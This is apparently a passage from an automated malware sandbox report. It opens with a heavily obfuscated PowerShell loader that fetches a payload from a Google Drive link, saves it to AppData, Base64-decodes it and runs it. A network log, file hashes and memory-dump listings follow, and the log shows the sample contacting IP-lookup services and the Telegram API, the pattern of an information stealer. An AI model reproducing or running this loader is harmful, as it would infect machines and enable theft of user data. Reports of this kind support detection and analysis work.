SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') ;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 168.6.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
memory/3204-0-0x00007FF9DD753000-0x00007FF9DD755000-memory.dmp
memory/3204-1-0x0000028DF01A0000-0x0000028DF01C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tbpiejy0.ydj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3204-11-0x00007FF9DD750000-0x00007FF9DE211000-memory.dmp
memory/3204-12-0x00007FF9DD750000-0x00007FF9DE211000-memory.dmp
memory/3204-15-0x00007FF9DD753000-0x00007FF9DD755000-memory.dmp
memory/3204-16-0x00007FF9DD750000-0x00007FF9DE211000-memory.dmp
memory/3204-19-0x00007FF9DD750000-0x00007FF9DE211000-memory.dmp
memory/4776-20-0x0000000004800000-0x0000000004836000-memory.dmp
memory/4776-21-0x0000000004E70000-0x0000000005498000-memory.dmp
memory/4776-22-0x00000000054F0000-0x0000000005512000-memory.dmp
memory/4776-24-0x0000000005670000-0x00000000056D6000-memory.dmp
memory/4776-23-0x0000000005590000-0x00000000055F6000-memory.dmp
memory/4776-34-0x0000000005760000-0x0000000005AB4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d336b18e0e02e045650ac4f24c7ecaa7 |
| SHA1 | 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c |
| SHA256 | 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27 |
| SHA512 | e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18 |
memory/4776-36-0x0000000005DA0000-0x0000000005DBE000-memory.dmp
memory/4776-37-0x0000000005E30000-0x0000000005E7C000-memory.dmp
memory/4776-38-0x00000000075F0000-0x0000000007C6A000-memory.dmp
memory/4776-39-0x0000000006340000-0x000000000635A000-memory.dmp
memory/4776-40-0x0000000007010000-0x00000000070A6000-memory.dmp
memory/4776-41-0x0000000006FA0000-0x0000000006FC2000-memory.dmp
memory/4776-42-0x0000000008220000-0x00000000087C4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Kondemnations.Stu
| MD5 | d3eaa25322d53ddaef4b33d72552badf |
| SHA1 | 4d703e333fce51d3849a1467268437b89d0cf239 |
| SHA256 | d35582b6c56ab0068075a1a5e338cd0d24c381673cf959eca45e516fedf471f3 |
| SHA512 | 60aa35eb0d284caab596550fe1218af035c4ba38e29196436c0f3e09f89b87d51a7bdf680995f260ab08e6b44d9e4f564cc589c3c63cbfb98598ace3ea5becd1 |
memory/4776-44-0x00000000087D0000-0x000000000C126000-memory.dmp
memory/4800-52-0x0000000000F40000-0x0000000002194000-memory.dmp
memory/4800-60-0x0000000000F40000-0x0000000000F88000-memory.dmp
memory/4800-59-0x0000000000F40000-0x0000000002194000-memory.dmp
memory/4800-61-0x0000000023800000-0x000000002389C000-memory.dmp
memory/4800-64-0x0000000024490000-0x0000000024652000-memory.dmp
memory/4800-65-0x0000000023C50000-0x0000000023CA0000-memory.dmp
memory/4800-67-0x0000000024360000-0x00000000243F2000-memory.dmp
memory/4800-68-0x0000000021290000-0x000000002129A000-memory.dmp